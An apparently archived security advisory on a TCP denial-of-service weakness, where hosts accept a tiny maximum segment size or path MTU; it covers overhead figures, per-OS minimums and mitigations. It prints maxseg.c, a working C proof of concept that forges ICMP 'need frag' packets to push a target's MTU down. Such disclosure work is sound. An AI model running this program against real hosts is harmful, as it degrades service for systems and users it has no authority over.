Vulnerability

    TCP/IP

Affected

    most systems

Description

Darren Reed found the following. On a LAN far far away, a rogue packet
was heading towards a server, ready to start up a new storm ...

If any of you have tested what happens to the ability of a box to
perform well when it has a small MTU, you will know that setting the MTU
to (say) 56 on a diskless thing is a VERY VERY bad idea when NFS
read/write packets are generally 8k in size. Do not try it on an NFS
thing unless you plan to reboot it, ok? The last time Darren did this was
when he worked out you could fragment packets inside the TCP header, and
that lesson was enough for him.

Following on from this, it occurs to me that the problem with the above
can possibly be reproduced with TCP. How? That thing called "maximum
segment size". The problem? Well, the first is that there does not
appear to be a minimum. The second is that it is negotiated by the
caller, not the callee. Did we hear someone say "oh dear"?

What does this mean? Well, if we connect to www.microsoft.com and set our
MSS to 143 (say), they need to send us 11 packets for every one they
would normally send us (with an MSS of 1436). Total output for them is
1876 bytes instead of 1476 - roughly a 27% increase. However, that's not
the real problem. Our experience is that hosts, especially PCs, have a
lot of trouble handling *LOTS* of interrupts. To send 2k out via the
network, it's no longer 2 packets but 20+ - a significant increase in
the workload.

A quick table (based on 20-byte IP and 20-byte TCP headers, so 40 bytes
of header per packet):

    datalen   mss  packets  total bytes  %increase
       1436  1436        1         1476         0%
       1436  1024        2         1516         3%
       1436   768        2         1516         3%
       1436   512        3         1556         5%
       1436   256        6         1676        14%
       1436   128       12         1916        30%
       1436    64       23         2356        60%
       1436    32       45         3236       119%
       1436    28       52         3516       138%  (MTU = 68)
       1436    16       90         5036       241%
       1436     8      180         8636       485%
       1436     1     1436        58876      3889%

For Solaris, you can enforce a more sane minimum MSS than the install
default (1) with ndd:

    ndd -set /dev/tcp tcp_mss_min 128

HP-UX 11.* is in the same basket as Solaris.
*BSD have varying minimums well above 1 - NetBSD at 32, FreeBSD at 64.
(OpenBSD's comment on this says 32 but the code says 64.) Linux 2.4 is
88. We can't see anything in the registry or MSDN which says what it is
for Windows. By experimentation, Win2000 appears to be 88 and NT 4
appears to be 1. Nothing else besides Solaris seems to have anything
close to a reasonable way to tune the minimum value.

What's most surprising is that there does not appear to be a documented
minimum, just as there is no "minimum MTU" size for IP. If there is,
please correct us. About the only bonus to this is that there does not
appear to be an easy way to affect the MSS sent in the initial SYN
packet.

Oh, so how's this a potential denial of service attack? Generally
network efficiency comes through sending lots of large packets... but
don't tell ATM folks that, of course.

Does it work? *shrug* It is not easy to test... The only testing Darren
could do (with NetBSD) was to use the TCP_MAXSEG setsockopt, BUT this
only affects the sending MSS (now what use is that?). Still, in testing,
changing it from the default 1460 to 1 caused the number of packets
needed to write 1436 bytes of data to discard to go from 9 to 2260. To
send 100 * 1436 bytes from the NetBSD box to Solaris8 took 60 seconds
(MSS of 1) vs ~1 second with an MSS of 1460.

Of even more significance, one connection like this made almost no
difference after the first run, but running a second saw kernel CPU jump
to 30% on an SS20/712 (we suspect there is some serious TCP tuning
happening dynamically). The sending host was likewise afflicted with a
significant CPU usage penalty if more than one was running. There were
some very surprising things happening too - with just one session
active, ~170-200pps were seen with netstat on Solaris, but with the
second, it was between 1750 and 1850pps. Can you say "ACK storm"?

Oh, and for fun you can enable TCP timestamping just to make those
headers bigger and run the system a bit harder whilst processing
packets!
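
The overhead figures in the table above can be recomputed with a few
lines of C. This is only a sketch under the table's own assumption of 40
bytes of IP and TCP header per packet with no options; the function names
(segments_needed, wire_bytes, pct_increase, print_overhead_table) are
made up for illustration and the percentages are rounded to the nearest
whole number.

```c
#include <assert.h>
#include <stdio.h>

/* Assumption: 20-byte IP header + 20-byte TCP header, no options. */
#define HDR_BYTES 40

/* Number of segments needed to carry datalen bytes at a given MSS. */
long segments_needed(long datalen, long mss)
{
    assert(datalen >= 0 && mss > 0);
    return (datalen + mss - 1) / mss;    /* ceiling division */
}

/* Bytes on the wire: the payload plus one header pair per segment. */
long wire_bytes(long datalen, long mss)
{
    return datalen + segments_needed(datalen, mss) * HDR_BYTES;
}

/*
 * Percentage increase over sending the same data in one segment,
 * rounded to the nearest whole percent.
 */
long pct_increase(long datalen, long mss)
{
    long base = datalen + HDR_BYTES;
    long extra = wire_bytes(datalen, mss) - base;

    return (extra * 100 + base / 2) / base;
}

/* Print one row per MSS value for a 1436-byte write. */
void print_overhead_table(void)
{
    static const long mss[] = { 1436, 1024, 768, 512, 256, 128,
                                64, 32, 28, 16, 8, 1 };
    const long datalen = 1436;
    size_t i;

    printf("%8s %6s %8s %12s %10s\n",
           "datalen", "mss", "packets", "total bytes", "%increase");
    for (i = 0; i < sizeof(mss) / sizeof(mss[0]); i++)
        printf("%8ld %6ld %8ld %12ld %9ld%%\n",
               datalen, mss[i], segments_needed(datalen, mss[i]),
               wire_bytes(datalen, mss[i]), pct_increase(datalen, mss[i]));
}
```

Calling print_overhead_table() from a main() prints one row per MSS
value. It counts header bytes only, so it says nothing about the
per-packet interrupt and ACK cost, which is the larger concern described
above.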

Darren didn't investigate the impact of ICMP PMTU discovery, but from
his reading of at least the BSD source code, the MTU for the route will
be ignored if it is less than the default MSS when sending out the TCP
SYN with the MSS option. That aside, it will still impact current
connections and would appear to be a way to force the _current_ MSS
below that set at connect time. On BSD, it will not accept PMTU updates
if the MTU is less than 296; on Solaris8 and Linux 2.4 it just needs to
be above 68 (hmmm, allows you to get an effective MSS of less than 88).

    /*
     * (C)Copyright 2001 Darren Reed.
     *
     * maxseg.c
     */
    #include <sys/types.h>
    #include <sys/param.h>
    #include <sys/socket.h>
    #include <sys/time.h>
    #if BSD >= 199306
    #include <sys/sysctl.h>
    #endif
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <netinet/ip_icmp.h>
    #include <netinet/ip_var.h>
    #include <netinet/tcp.h>
    #include <netinet/tcp_timer.h>
    #include <netinet/tcp_var.h>
    #include <arpa/inet.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <time.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <err.h>

    void prepare_icmp(struct sockaddr_in *);
    void primedefaultmss(int, int);
    u_short in_cksum(u_short *, int);
    int icmp_unreach(struct sockaddr_in *, struct sockaddr_in *);

    #define NEW_MSS 512
    #define NEW_MTU 1500

    static int start_mtu = NEW_MTU;

    /*
     * Set the system default MSS (NetBSD) and/or the per-socket MSS we
     * advertise (hacked kernel only).  Passing mss == 0 restores the
     * default that was saved on the first call.
     */
    void
    primedefaultmss(int fd, int mss)
    {
    #ifdef __NetBSD__
        static int defaultmss = 0;
        int mib[4], msso, mssn;
        size_t olen;

        if (mss == 0)
            mss = defaultmss;
        mssn = mss;
        olen = sizeof(msso);

        mib[0] = CTL_NET;
        mib[1] = AF_INET;
        mib[2] = IPPROTO_TCP;
        mib[3] = TCPCTL_MSSDFLT;
        /* read the old value, write the new one, then read it back */
        if (sysctl(mib, 4, &msso, &olen, NULL, 0))
            err(1, "sysctl");
        if (defaultmss == 0)
            defaultmss = msso;
        if (sysctl(mib, 4, 0, NULL, &mssn, sizeof(mssn)))
            err(1, "sysctl");
        if (sysctl(mib, 4, &mssn, &olen, NULL, 0))
            err(1, "sysctl");
        printf("Default MSS: old %d new %d\n", msso, mssn);
    #endif

    #if HACKED_KERNEL
        /* TCP_MAXSEG+1 is a private option; skip it when there is no socket */
        if (fd != -1) {
            int op = mss ? mss : 512;

            if (setsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1,
                           (char *)&op, sizeof(op)))
                err(1, "setsockopt");
        }
    #endif
    }

    int
    main(int argc, char *argv[])
    {
        struct sockaddr_in me, them;
        int fd, op, mss;
        socklen_t olen;
        ssize_t n;
        char prebuf[16374];
        time_t now1, now2;
        struct timeval tv;

        if (argc < 3)
            errx(1, "usage: %s address port", argv[0]);

        mss = NEW_MSS;
        primedefaultmss(-1, mss);

        fd = socket(AF_INET, SOCK_STREAM, 0);
        if (fd == -1)
            err(1, "socket");

        memset(&them, 0, sizeof(them));
        them.sin_family = AF_INET;
        them.sin_port = htons(atoi(argv[2]));
        them.sin_addr.s_addr = inet_addr(argv[1]);

        primedefaultmss(fd, mss);

        op = fcntl(fd, F_GETFL, 0);
        if (op != -1) {
            op |= O_NONBLOCK;
            fcntl(fd, F_SETFL, op);
        }

        op = 1;
        (void) setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &op, sizeof(op));

        if (connect(fd, (struct sockaddr *)&them, sizeof(them)) &&
            (errno != EINPROGRESS))
            err(1, "connect");

        olen = sizeof(op);
        if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG, (char *)&op, &olen))
            printf("Remote mss %d\n", op);
        else
            err(1, "getsockopt");

    #if HACKED_KERNEL
        olen = sizeof(op);
        if (!getsockopt(fd, IPPROTO_TCP, TCP_MAXSEG+1, (char *)&op, &olen))
            printf("Our mss %d\n", op);
        else
            err(1, "getsockopt(+1)");
    #endif

        olen = sizeof(me);
        if (getsockname(fd, (struct sockaddr *)&me, &olen))
            err(1, "getsockname");

        (void) read(fd, prebuf, sizeof(prebuf));

        now1 = time(NULL);
        for (op = 2; op; op--) {
            /* each call halves the advertised next-hop MTU */
            icmp_unreach(&me, &them);
            n = read(fd, prebuf, sizeof(prebuf));
            if (n == -1) {
                if (errno == ENOBUFS || errno == EAGAIN ||
                    errno == EWOULDBLOCK) {
                    tv.tv_sec = 0;
                    tv.tv_usec = 10000;
                    select(3, NULL, NULL, NULL, &tv);
                    continue;
                }
                warn("read");
                break;
            }
        }
        now2 = time(NULL);
        printf("Elapsed time %ld\n", (long)(now2 - now1));

        primedefaultmss(fd, 0);
        close(fd);
        return 0;
    }

    /*
     * in_cksum() & icmp_unreach() ripped from nuke.c prior to modifying
     */
    static char icmpbuf[256];
    static int icmpsock = -1;
    static struct sockaddr_in destsock;

    /* Build the ICMP "need frag" template once, then refresh the MTU. */
    void
    prepare_icmp(struct sockaddr_in *dst)
    {
        struct tcphdr *tcp;
        struct icmp *icmp;

        icmp = (struct icmp *)icmpbuf;

        if (icmpsock == -1) {
            memset(&destsock, 0, sizeof(destsock));
            destsock.sin_family = AF_INET;
            destsock.sin_addr = dst->sin_addr;

            srand(getpid());

            icmpsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
            if (icmpsock == -1)
                err(1, "socket");

            /* the following messy stuff from Adam Glass (icmpsquish.c) */
            memset(icmp, 0, sizeof(struct icmp) + 8);
            icmp->icmp_type = ICMP_UNREACH;
            icmp->icmp_code = ICMP_UNREACH_NEEDFRAG;
            icmp->icmp_pmvoid = 0;

            icmp->icmp_ip.ip_v = IPVERSION;
            icmp->icmp_ip.ip_hl = 5;
            icmp->icmp_ip.ip_len = htons(NEW_MSS);
            icmp->icmp_ip.ip_p = IPPROTO_TCP;
            icmp->icmp_ip.ip_off = htons(IP_DF);
            icmp->icmp_ip.ip_ttl = 11 + (rand() % 50);
            icmp->icmp_ip.ip_id = rand() & 0xffff;

            icmp->icmp_ip.ip_src = dst->sin_addr;

            tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
            tcp->th_sport = dst->sin_port;
        }
        icmp->icmp_nextmtu = htons(start_mtu);
        icmp->icmp_cksum = 0;
    }

    u_short
    in_cksum(u_short *addr, int len)
    {
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer = 0;

        /*
         * Our algorithm is simple, using a 32 bit accumulator (sum),
         * we add sequential 16 bit words to it, and at the end, fold
         * back all the carry bits from the top 16 bits into the lower
         * 16 bits.
         */
        while (nleft > 1) {
            sum += *w++;
            nleft -= 2;
        }

        /* mop up an odd byte, if necessary */
        if (nleft == 1) {
            *(u_char *)(&answer) = *(u_char *)w;
            sum += answer;
        }

        /*
         * add back carry outs from top 16 bits to low 16 bits
         */
        sum = (sum >> 16) + (sum & 0xffff);    /* add hi 16 to low 16 */
        sum += (sum >> 16);                    /* add carry */
        answer = ~sum;                         /* truncate to 16 bits */
        return (answer);
    }

    /* Send one forged "need frag" ICMP for the connection src <-> dst. */
    int
    icmp_unreach(struct sockaddr_in *src, struct sockaddr_in *dst)
    {
        struct tcphdr *tcp;
        struct icmp *icmp;
        u_short sum;
        int i;

        icmp = (struct icmp *)icmpbuf;

        prepare_icmp(dst);

        icmp->icmp_ip.ip_dst = src->sin_addr;

        sum = in_cksum((u_short *)&icmp->icmp_ip, sizeof(struct ip));
        icmp->icmp_ip.ip_sum = sum;

        tcp = (struct tcphdr *)(&icmp->icmp_ip + 1);
        tcp->th_dport = src->sin_port;

        sum = in_cksum((u_short *)icmp, sizeof(struct icmp) + 8);
        icmp->icmp_cksum = sum;

        /* halve the MTU for the next message, but never go below 69 */
        start_mtu /= 2;
        if (start_mtu < 69)
            start_mtu = 69;

        i = sendto(icmpsock, icmpbuf, sizeof(struct icmp) + 8, 0,
                   (struct sockaddr *)&destsock, sizeof(destsock));
        if (i == -1 && errno != ENOBUFS && errno != EAGAIN &&
            errno != EWOULDBLOCK)
            err(1, "sendto");

        return (0);
    }

Some people do not understand the difference between the TCP MSS and
IP's MTU. Either that or both you and David LeBlanc are grasping at
straws in order to make WindowsNT look better. MTU and Path MTU (PMTU)
discovery are not the same as TCP's MSS, but they can and do impact it.

Darren managed to get NT4.0 (workstation) to accept a TCP MSS of 1 (it
sent lots of data packets out that had 1 byte of data) and he got
Win2000 to accept an MTU of 69 (effective MSS of 17 after TCP options)
through PMTU discovery. Now, if 20+68 is the reason why 88 is the
minimum MSS Win2000 will accept, then someone doesn't understand what
the word "MTU" means, because it refers to the TOTAL IP datagram length,
not the data part.

Using the C program above, one is able to get Win2000 to create an
MTU-specific path to a local box where the MTU was 69.
That's well under any number over 500 (depending on how you choose to
see the value). Path MTU discovery has absolutely no interaction with
the TCP MSS except that one would expect it to be used if a cached path
already existed to a host, with an MTU specific for it set, when
initiating or accepting a new TCP connection.

Solution

Quite clearly the host operating system needs to set a much more sane
minimum MSS than 1. Given there is no minimum MTU for IP - well, maybe
"68" - it's hard to derive what it should be. Anything below 40 should
just be banned (that's the point at which you're transmitting 50% data,
50% headers). Most of the defaults, above, are chosen because they fit
in well with the system's internal network buffering (some use a default
MSS of 512 rather than 536 for similar reasons). But above that, what do
you choose? 80 for a 25/75 split, or something higher still?

Whatever the choice and however it is calculated, it is not enough to
just enforce it when the MSS option is received. It also needs to be
enforced when the MTU parameter is checked in ICMP "need frag" packets.
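
The two enforcement points can be sketched as a pair of clamping
functions. This is an illustration, not code from any real stack:
MIN_MSS_FLOOR (128, borrowed from the ndd example), clamp_peer_mss() and
mss_from_pmtu() are hypothetical names, and the header sizes assume no
IP or TCP options. It also glosses over what a real stack must do when
it refuses a tiny MTU (ignore the ICMP outright, or stop setting DF so
routers can fragment).

```c
#include <assert.h>

#define IP_HDR_LEN     20   /* assumption: no IP options */
#define TCP_HDR_LEN    20   /* assumption: no TCP options */
#define MIN_MSS_FLOOR 128   /* hypothetical policy value */

/*
 * Enforcement point 1: the MSS option received from the peer.
 * The result is never below the floor and never above what we
 * are prepared to send ourselves.
 */
int clamp_peer_mss(int offered_mss, int local_max_mss)
{
    assert(local_max_mss >= MIN_MSS_FLOOR);

    if (offered_mss < MIN_MSS_FLOOR)
        return MIN_MSS_FLOOR;
    if (offered_mss > local_max_mss)
        return local_max_mss;
    return offered_mss;
}

/*
 * Enforcement point 2: the next-hop MTU carried in an ICMP
 * "need frag" message.  The MTU covers the whole IP datagram, so
 * the headers are subtracted before comparing against the floor.
 * A PMTU update may lower the current MSS but never raise it.
 */
int mss_from_pmtu(int next_hop_mtu, int current_mss)
{
    int candidate = next_hop_mtu - IP_HDR_LEN - TCP_HDR_LEN;

    if (candidate < MIN_MSS_FLOOR)
        candidate = MIN_MSS_FLOOR;
    if (candidate > current_mss)
        candidate = current_mss;
    return candidate;
}
```

With these definitions, an offered MSS of 1 and a forged next-hop MTU of
69 both end up at the floor of 128 instead of being accepted as sent,
while an ordinary update such as an MTU of 576 still lowers a 1460-byte
MSS to 536.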